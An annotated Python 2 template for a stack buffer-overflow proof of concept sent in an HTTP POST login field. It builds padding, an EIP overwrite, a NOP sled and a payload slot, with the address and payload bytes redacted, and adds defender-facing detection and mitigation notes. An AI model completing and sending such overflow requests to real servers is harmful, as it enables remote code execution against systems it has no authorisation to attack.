exploit_bo_HTTP.py

#!/usr/bin/python
import socket
# Template for a stack buffer-overflow proof of concept delivered in an HTTP
# POST form field. Python 2 syntax (print statements, byte-valued str).
# The address and byte values below are redacted placeholders.
#
# What a defender sees on the wire from this request shape:
#   - a POST to /login whose param1 value is far longer than a login field
#     needs, carrying raw bytes that are not percent-encoded even though the
#     Content-Type claims application/x-www-form-urlencoded;
#   - a run of 0x90 bytes inside the body;
#   - a fixed, non-browser User-Agent ("abc").
# Mitigation belongs in the server code that copies param1: enforce a length
# bound before the copy, and build with stack canaries, DEP/NX and ASLR.
IP="x.x.x.x"  # placeholder target address, also reused as the Host header
PORT=80

try:
    print "\nSending buffer..."

    # Redacted placeholder bytes; "\x.." is not a valid escape as written.
    # Placed last in the buffer, after the NOP run -- presumably the payload
    # slot (inferred from position and name; nothing here defines it).
    myprecious = ("\x..\x..")

    filler = "A" * 100          # 100 bytes of padding at the start of the field
    eip = "\x..\x..\x..\x.."    # 4 redacted bytes; name suggests the saved-EIP overwrite value
    offset = "C" * 4            # 4 more padding bytes between eip and the NOP run
    nops = "\x90" * 10          # ten 0x90 bytes (the x86 NOP opcode)

    # Order matters: the pieces are concatenated exactly in this sequence.
    inputBuffer = filler + eip + offset + nops + myprecious

    # The buffer is dropped into param1 without URL-encoding, so the body
    # holds raw bytes; param2 is a fixed short value.
    content = "param1=" + inputBuffer + "&param2=Abc"
    buffer = "POST /login HTTP/1.1\r\n"
    buffer += "Host: " + IP + "\r\n"
    buffer += "User-Agent: abc\r\n"
    buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    buffer += "Accept-Language: en-US,en;q=0.5\r\n"
    buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
    # Content-Length is computed from the body, so the request is well-formed
    # HTTP and will pass a parser that only checks framing.
    buffer += "Content-Length: "+str(len(content))+"\r\n"
    buffer += "\r\n"
    buffer += content
    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
    s.connect((IP, PORT))
    # The response is never read; the socket is closed right after the send.
    s.send(buffer)
    s.close()
    print "\nDone!"
# NOTE(review): bare except catches every exception raised in the try body,
# not only connection failures, so the message below can be misleading.
except:
    print "\nCould not connect!"